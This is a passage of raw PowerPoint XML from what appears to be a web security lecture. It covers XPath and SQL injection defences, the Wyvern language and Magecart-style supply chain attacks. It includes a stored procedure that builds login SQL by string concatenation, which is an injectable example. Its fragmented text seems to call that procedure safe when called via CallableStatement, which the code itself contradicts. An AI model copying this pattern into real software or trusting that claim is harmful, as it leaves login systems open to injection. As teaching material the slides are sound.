              </a:rPr>
              <a:t> on  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the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programming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language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; database system!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r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath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injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>some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APIs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now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> offer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameterised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aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pre-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compiled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XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evaluation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eg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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XPathVariableResolver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in Java </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-NL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1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> look </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> details </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>combination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>back-end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> system  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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256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nl-NL" smtClean="0"/>
              <a:t>Example stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:t>rocedures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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oracle's PL/SQL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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  CREATE PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>login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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      (name VARCHAR(100), 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pwd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 VARCHAR(100)) AS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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   DECLARE @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sql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 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nvarchar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(4000) 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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   SELECT @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sql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 =' SELECT * FROM Account WHERE        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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   username=' + @name + 'AND password=' + @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pwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1600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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   EXEC (@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sql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)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" altLang="nl-NL" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‏</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1600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dirty="0" smtClean="0"/>
              <a:t>is safe when called from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" dirty="0" smtClean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dirty="0" smtClean="0"/>
              <a:t>     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CallableStatement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 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proc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 =  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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    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connection.prepareCall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("{call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>login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(?, ?)}"); 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smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   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proc.setString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(1, username); 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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(2, password);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sz="1800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sz="1800" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49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1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fld id="{B53FEF4B-AFC4-4FAA-9197-1F3782999943}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="14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92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Going one step further: Wyvern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Maybe the programming language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> support the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>various</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> formats used (HTML, SQL, ..) as different types?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Wyvern allows such domain-specific extensions, eg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where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>are different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>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language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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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64" y="2420888"/>
            <a:ext cx="6120680" cy="28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Tackling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>confusion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Wyvern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>addresses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confusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>too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 input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>languages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formats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language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/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>sing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>types or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>classes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>classifications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>data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made </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>typed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>programming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>language</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>eg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>types </a:t>
            </a:r>
            <a:r>
              <a:rPr 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nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="18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EmailAdress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="18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HTMLfragment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, …                                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> type </a:t>
            </a:r>
            <a:r>
              <a:rPr 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Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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nl-NL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nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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dirty="0" err="1"/>
              <a:t>everything</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p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o read about Wyvern:                                                                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Darya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Kurilova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, Alex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Potanin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, and Jonathan Aldrich, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wyvern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Impacting Software Security via Programming Language Design</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>PLATEAU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>2014, ACM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>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244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9803"/>
            <a:ext cx="5867400" cy="478872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276225"/>
            <a:ext cx="7761288" cy="685009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0"/>
              <a:t>How would you attack this web site?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" baseline="-25000" dirty="0">
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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5220073" y="3674201"/>
            <a:ext cx="28760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Less obvious input channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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: supply chain attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Example supply chain attacks  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sz="1600" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>://www.wired.com/story/magecart-amazon-cloud-hacks/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websec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5" y="2139120"/>
            <a:ext cx="6045200" cy="958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3" y="959457"/>
            <a:ext cx="6131083" cy="10992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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4866652" y="2778971"/>
            <a:ext cx="4023910" cy="162159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03013"/>
            <a:ext cx="5940152" cy="13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Supply chain attacks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en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack vector that is increasingly popular in recent years:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                      corrupt 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party library with malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>or websites: via 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>avaScript </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> JavaScript that scrapes webpage for forms with credit card data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>One of in the ways that the criminal group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Magecart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> did this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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look for misconfigured S3 buckets in Amazon cloud that are world-readable &amp; writeable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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dd malicious code to any *.</a:t>
            </a:r>
            <a:r>
